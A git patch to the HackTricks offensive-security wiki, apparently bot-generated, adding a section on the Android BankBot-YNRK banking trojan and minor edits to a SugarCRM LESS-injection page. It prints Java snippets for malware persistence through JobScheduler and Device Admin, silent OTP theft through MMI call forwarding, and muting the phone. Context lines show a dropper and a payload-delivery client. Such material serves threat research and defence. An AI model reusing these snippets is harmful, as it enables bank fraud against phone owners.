From 70eefb8ad89853e11cbeb9a08a9db09bec993a88 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Mon, 3 Nov 2025 12:54:49 +0000 Subject: [PATCH] =?UTF-8?q?Add=20content=20from:=20Investigation=20Report:?= =?UTF-8?q?=20Android/BankBot=E2=80=91YNRK=20Mobile=20Banking=20Tr...?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../mobile-phishing-malicious-apps.md | 75 ++++++++++++++++++- .../css-injection/less-code-injection.md | 7 +- 2 files changed, 77 insertions(+), 5 deletions(-) diff --git a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md index 7ca3e849fb4..3856fd5e0d9 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md @@ -63,6 +63,9 @@ ## Useful Frida Snippet: Auto-Bypass Invitation Code +
+Frida hook to bypass invitation code + ```python # frida -U -f com.badapp.android -l bypass.js --no-pause # Hook HttpURLConnection write to always return success @@ -82,6 +85,8 @@ Java.perform(function() { }); ``` +
+ ## Indicators (Generic) ``` @@ -145,7 +150,7 @@ Minimal loader: ```java WebView wv = findViewById(R.id.web); wv.getSettings().setJavaScriptEnabled(true); -wv.loadUrl(upiPage); // ex: https:///gate.htm +wv.loadUrl(upiPage); // ex: https://``/gate.htm ``` ### Self-propagation and SMS/OTP interception @@ -228,9 +233,12 @@ Attackers increasingly replace static APK links with a Socket.IO/WebSocket chann Typical client flow observed in the wild: +
+Socket.IO client flow assembling APK in the browser + ```javascript // Open Socket.IO channel and request payload -const socket = io("wss:///ws", { transports: ["websocket"] }); +const socket = io("wss://``/ws", { transports: ["websocket"] }); socket.emit("startDownload", { app: "com.example.app" }); // Accumulate binary chunks and drive fake Play progress UI @@ -248,6 +256,8 @@ socket.on("downloadComplete", () => { }); ``` +
+ Why it evades simple controls: - No static APK URL is exposed; payload is reconstructed in memory from WebSocket frames. - URL/MIME/extension filters that block direct .apk responses may miss binary data tunneled via WebSockets/Socket.IO. @@ -265,6 +275,59 @@ See also WebSocket tradecraft and tooling: {{#endref}} +## Accessibility-driven banker TTPs: JobScheduler + Device Admin + MMI call forwarding (BankBot‑YNRK) + +The Android/BankBot‑YNRK banker shows a compact stack for durable control and on‑device fraud via Accessibility. Key reusable traits: + +- Bootstrap & scope + - Target Android ≤ 13 where Accessibility can still auto‑drive permission flows; deep‑link Accessibility Settings and auto‑accept prompts. See: + +{{#ref}} +../../mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md +{{#endref}} + +- Persistence via JobScheduler + Device Admin + - Schedule a persisted job (survives reboot) to regularly re‑kick background tasks: + ```java + ComponentName svc = new ComponentName(ctx, JobHandlerService.class); + JobInfo ji = new JobInfo.Builder(1337, svc) + .setRequiredNetworkType(JobInfo.NETWORK_TYPE_ANY) + .setPersisted(true) + .setMinimumLatency(30_000) + .setBackoffCriteria(30_000, JobInfo.BACKOFF_POLICY_LINEAR) + .build(); + ctx.getSystemService(JobScheduler.class).schedule(ji); + ``` + - Enrol as Device Admin to harden removal and regain control after reboot: + ```java + Intent i = new Intent(DevicePolicyManager.ACTION_ADD_DEVICE_ADMIN); + i.putExtra(DevicePolicyManager.EXTRA_DEVICE_ADMIN, new ComponentName(ctx, AdminReceiver.class)); + i.putExtra(DevicePolicyManager.EXTRA_ADD_EXPLANATION, "Enable advanced protections"); + ctx.startActivity(i); + ``` + +- Silent OTP interception via call forwarding (MMI/USSD) + - Programmatically dial MMI to enable unconditional call forwarding, diverting voice OTPs to an attacker‑controlled number: + ```java + // Requires CALL_PHONE; behaviour varies by carrier/OEM + String mmi = "**21*" + number + "#"; + Intent call = new Intent(Intent.ACTION_CALL, Uri.parse("tel:" + Uri.encode(mmi))); + ctx.startActivity(call); + ``` + +- C2 & traffic + - Stage‑based HTTP tasking (e.g., on `:8181`) exchanging device/app context and target package lists; optional WebSocket/WebRTC (Janus on `:8989`) for interactive control. + +- Anti‑analysis & stealth + - Fingerprint vendor/ROM/emulator at init (`android.os.Build` fields, model→resolution maps) to gate execution. + - Suppress audible cues by muting multiple AudioManager streams when sensitive actions run: + ```java + AudioManager am = (AudioManager) ctx.getSystemService(Context.AUDIO_SERVICE); + int[] S = {AudioManager.STREAM_MUSIC, AudioManager.STREAM_RING, AudioManager.STREAM_NOTIFICATION}; + for (int s: S) am.setStreamVolume(s, 0, 0); + ``` + + ## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration – RatOn case study The RatOn banker/RAT campaign (ThreatFabric) is a concrete example of how modern mobile phishing operations blend WebView droppers, Accessibility-driven UI automation, overlays/ransom, Device Admin coercion, Automated Transfer System (ATS), crypto wallet takeover, and even NFC-relay orchestration. This section abstracts the reusable techniques. @@ -274,6 +337,9 @@ Attackers present a WebView pointing to an attacker page and inject a JavaScript Minimal pattern: +
+WebView dropper that installs a second-stage payload from assets + ```java public class DropperActivity extends Activity { @Override protected void onCreate(Bundle b){ @@ -303,6 +369,8 @@ public class DropperActivity extends Activity { } ``` +
+ HTML on the page: ```html @@ -440,5 +508,6 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new - [Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)](https://dti.domaintools.com/banker-trojan-targeting-indonesian-and-vietnamese-android-users/) - [DomainTools SecuritySnacks – ID/VN Banker Trojans (IOCs)](https://github.com/DomainTools/SecuritySnacks/blob/main/2025/BankerTrojan-ID-VN) - [Socket.IO](https://socket.io) +- [Investigation Report: Android/BankBot‑YNRK Mobile Banking Trojan (CYFIRMA)](https://www.cyfirma.com/research/investigation-report-android-bankbot-ynrk-mobile-banking-trojan/) -{{#include ../../banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/pentesting-web/xs-search/css-injection/less-code-injection.md b/src/pentesting-web/xs-search/css-injection/less-code-injection.md index b9d599deb30..6d338df2b68 100644 --- a/src/pentesting-web/xs-search/css-injection/less-code-injection.md +++ b/src/pentesting-web/xs-search/css-injection/less-code-injection.md @@ -1,4 +1,6 @@ -## LESS Code Injection leading to SSRF & Local File Read +# LESS Code Injection leading to SSRF & Local File Read + +{{#include ../../../banners/hacktricks-training.md}} LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive. During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used. @@ -59,4 +61,5 @@ curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \ * [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04) * [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/) -* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258) \ No newline at end of file +* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258) +{{#include ../../../banners/hacktricks-training.md}}